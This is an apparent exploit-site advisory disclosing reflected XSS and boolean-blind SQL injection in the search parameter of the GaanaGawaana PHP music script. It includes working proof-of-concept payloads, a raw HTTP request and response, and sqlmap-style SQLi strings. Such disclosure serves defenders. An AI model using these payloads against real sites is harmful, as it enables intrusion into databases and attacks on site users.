GaanaGawaana Music Platform PHP Script 1.0 Cross Site Scripting / SQL Injection

Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes

## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflected and SQLi Vulnerability ## Author: nu11secur1ty ## Date: 05.16.2023 ## Vendor: ## Software: ## Reference XSS: ## Reference SQLi: ## Description: XSS: The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload aw9rx</title><script>alert(1)</script>rg1m6 was submitted in the q parameter. This input was echoed unmodified in the application's response. -------------------------------------------------------------------------------------------------------------------------------- SQLi: The q parameter appears to be vulnerable to SQL injection attacks. The payloads 70346811' or 7218=7218-- and 18028207' or 8587=8593-- were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. STATUS: CRITICAL Vulnerability [+]Exploit-XSS-test: ```XSS GET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2 Host: Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+]Response-XSS-test: ``` HTTP/2 200 OK Cache-Control: no-store, max-age=0, no-cache Date: Tue, 16 May 2023 06:39:12 GMT Content-Type: text/html; charset=UTF-8 Server: Apache <html> <head> <title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download, Listen & Lyrics</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ``` -------------------------------------------------------------------- [+]Payload-SQLi: ```SQLi --- Parameter: q (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde --- ``` ## Reproduce: [href]( ## Proof and Exploit: [href]( ## Time spend: 01:10:00

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top